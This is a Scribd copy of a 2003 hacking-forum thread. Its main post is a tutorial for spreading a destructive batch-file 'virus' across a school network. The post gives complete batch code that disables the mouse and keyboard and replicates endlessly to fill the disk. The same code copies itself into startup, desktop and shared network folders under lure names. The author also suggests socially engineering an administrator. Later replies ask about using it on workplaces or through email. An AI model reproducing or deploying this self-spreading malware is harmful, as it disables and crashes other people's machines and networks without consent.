The document discusses three ways to spread a batch file virus through a computer network. The first way involves copying the batch file to common folders on computers to infect other machines. It would also continuously grow a file to crash computers. The second way copies the file to a network drive to spread. The third involves tricking an administrator into infecting the main network computer to shut down the whole network. Later posts discuss how networks have restrictions and whether it could work through email.
Download as DOCX, PDF, TXT or read online on Scribd
0 ratings0% found this document useful (0 votes)
382 views
How To Spread A Batch File Thru A Network
The document discusses three ways to spread a batch file virus through a computer network. The first way involves copying the batch file to common folders on computers to infect other machines. It would also continuously grow a file to crash computers. The second way copies the file to a network drive to spread. The third involves tricking an administrator into infecting the main network computer to shut down the whole network. Later posts discuss how networks have restrictions and whether it could work through email.
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 10
K this tutorial is going to explain how to spread a batch
file thru a network.
it is needed to know the basics of batch first, and you must go learn a more complicated language like c++ or VBScript
-------------------- 1) introduction --- ok so you know the basics on batch and are willing to learn more about it. Well you can. In this tutorial there will be 3 ways explained on how to spread a virus.
small list of commands that must be known, ELSE STOP READING THIS AND LOOK FOR Batch for Idiots I and II
echo - basic echo command @echo off - not displaying commands cls - clearing screen copy %0 - copy the running file copy - copy a file cd - current directory pause - waiting for user to press a button >nul - not displaying a command >> - placing the text to the end of a file
-------------------- 2) The first way --- now i know you are all curious about how to spread it but let's first make a code to spread... i have made this
Quote :start @echo off c:\windows\rundll32.exe mouse,disable c:\windows\rundll32.exe keyboard,disable set sk = skoolfuck.bat cls echo SK()()L \/\/ () R /\/\ ACTIVATED echo. echo This SK()()L is fucked by: echo. echo -----=====I3L4D3/\/\4ST3R=====----- if exist c:\%sk% del %0 copy %0 c:\%sk% start c:\%sk% goto start
ok first what this "virus" does it echos all bullshit sets sk as skoolfuck.bat, copys itself to sk and starts sk
now we want to make this file go all around the school network, because we really hate the skool
we add this code
Quote :mid if exist c:\winnt goto winnt copy %0 c:\windows\AllUse~1\Applic~1\Open This Now.bat copy %0 c:\windows\alluse~1\Destkop\Open This Now.bat copy %0 c:\windows\alluse~1\startm~1\Open This Now.bat copy %0 c:\windows\alluse~1\startm~1\progra~1\Open This Now.bat goto end :winnt copy %0 c:\winnt\AllUse~1\Applic~1\Open This Now.bat copy %0 c:\winnt\alluse~1\Destkop\Open This Now.bat copy %0 c:\winnt\alluse~1\startm~1\Open This Now.bat copy %0 c:\winnt\alluse~1\startm~1\progra~1\Open This Now.bat goto end :end goto start
In the end the batch file should look like this
Quote :start @echo off c:\windows\rundll32.exe mouse,disable c:\windows\rundll32.exe keyboard,disable set sk = skoolfuck.bat cls echo SK()()L \/\/ () R /\/\ ACTIVATED echo. echo This SK()()L is fucked by: echo. echo -----=====I3L4D3/\/\4ST3R=====----- if exist c:\%sk% del %0 copy %0 c:\%sk% start c:\%sk% :mid if exist c:\winnt goto winnt copy %0 c:\windows\AllUse~1\Applic~1\Open This Now.bat copy %0 c:\windows\alluse~1\Destkop\Open This Now.bat copy %0 c:\windows\alluse~1\startm~1\Open This Now.bat copy %0 c:\windows\alluse~1\startm~1\progra~1\Open This Now.bat goto end :winnt copy %0 c:\winnt\AllUse~1\Applic~1\Open This Now.bat copy %0 c:\winnt\alluse~1\Destkop\Open This Now.bat copy %0 c:\winnt\alluse~1\startm~1\Open This Now.bat copy %0 c:\winnt\alluse~1\startm~1\progra~1\Open This Now.bat goto end :end goto start
Ok so that was the first way... with this code it doesnt only really irritate someone, but it also keeps making the file c:\skoolfuck.bat bigger and bigger every 10 seconds the file is opened. the more people that open the file the bigger the file gets. the formula for the file growth is = 120 x numberofusersthatopenedfile / 5 x 60
so if 200 people on your school opens it you get a growth of 288000 KB per minute which is 281,25 MB per minute
within 15 minutes every PC in the school will crash.
---------------------- 3) The second way --- This is far the easyiest way of spreading a virus... ... but it is most of the time insecure. this is because you need to know what the name of the network drive on school is at my school its H: so ill use that i use the same script as above
Quote :start @echo off c:\windows\rundll32.exe mouse,disable c:\windows\rundll32.exe keyboard,disable set sk = skoolfuck.bat cls echo SK()()L \/\/ () R /\/\ ACTIVATED echo. echo This SK()()L is fucked by: echo. echo -----=====I3L4D3/\/\4ST3R=====----- if exist c:\%sk% del %0 copy %0 c:\%sk% start c:\%sk% copy %0 h:\docume~1\userli~1\ALL OPEN THIS.bat goto start
ok that wasnt so hard -------------------------- 4) the third way --- ask the operator to install the disk you have in your hand in the main networking computer... if he's stupid enough and does it only 1 person has 2 open it and the school is offline -------------------------- 5) what i want --- what i recommend is using the first method because its deadly. what i want is that noone uses the name 13lademaster, exactly copys the scripts above or any of the code in it Back to top #2 dragonslayer Posted 20 April 2003 - 06:02 PM Forum Newbie
Members
71 posts Reputation: 0 thats so complicated im dumb :zonked: :zonked: :zonked: :zonked: :zonked: :zonked: :zonked: :zonked: Back to top #3 black_bot Posted 20 April 2003 - 06:15 PM Junior Member
Members
167 posts Reputation: 0 dragonslayer, on April 20 2003, 1:02 pm, said: thats so complicated im dumb :zonked: :zonked: :zonked: :zonked: :zonked: :zonked: :zonked: :zonked: thats why you got to know vbscript or c++ Back to top #4 curious Posted 21 April 2003 - 05:54 PM Forum Newbie
Members
33 posts Reputation: 0 Interests:Rapping,using my free website to practice for the real deal and make a profit,and make my "the other baby momma drama" go away.WWE/DBZ Hello. Will this work somewhere other than a school? Like someone's job computer or through their email? Feel free to PM me. Back to top #5 Alexandra Posted 21 April 2003 - 05:55 PM Have YOU "done" a duck?
Members
884 posts Reputation: 0 dragonslayer, on April 20 2003, 6:02 am, said: thats so complicated im dumb :zonked: :zonked: :zonked: :zonked: :zonked: :zonked: :zonked: :zonked: agghh stop spaming! :duh: :duh: :duh: DO NOT ASK/PM THIS ACCT I WILL NOT REPLY *ACCT ABANDEND* Back to top #6 nielserman Posted 22 April 2003 - 03:18 PM Beer is liquid bread, it's good for you.
Members
1742 posts Reputation: 0 Interests:http://www.web-earner.net/pages/index.php?refid=blademaster IT WORKS ON EVERY NETWORK, no matter if its home office school or whatever. DOES NOT WORK ON e-mail Back to top #7 michiel Posted 22 April 2003 - 04:22 PM boomshakalaka
Members
1799 posts Reputation: 2 Gender:Male Please note that networks have restrictions and tese do not allow you to copy a batch to restricted folders or even execute a batch :suspect: "Im going for the l337 approach at this. I will launch an uber 1337 batch payload virus at you. Then we will see who is lafing" Back to top #8 Lightning_Presitidigitator Posted 22 April 2003 - 10:21 PM Forum Newbie
Members
66 posts Reputation: 0 I still dont get how could such file spread. Does it go to other people's computer secretly or something? Back to top Back to Programming
2 user(s) are reading this topic 0 members, 1 guests, 0 anonymous users
Facebook (1)
Community Forum Software by IP.Board Licensed to: Rohitab Batra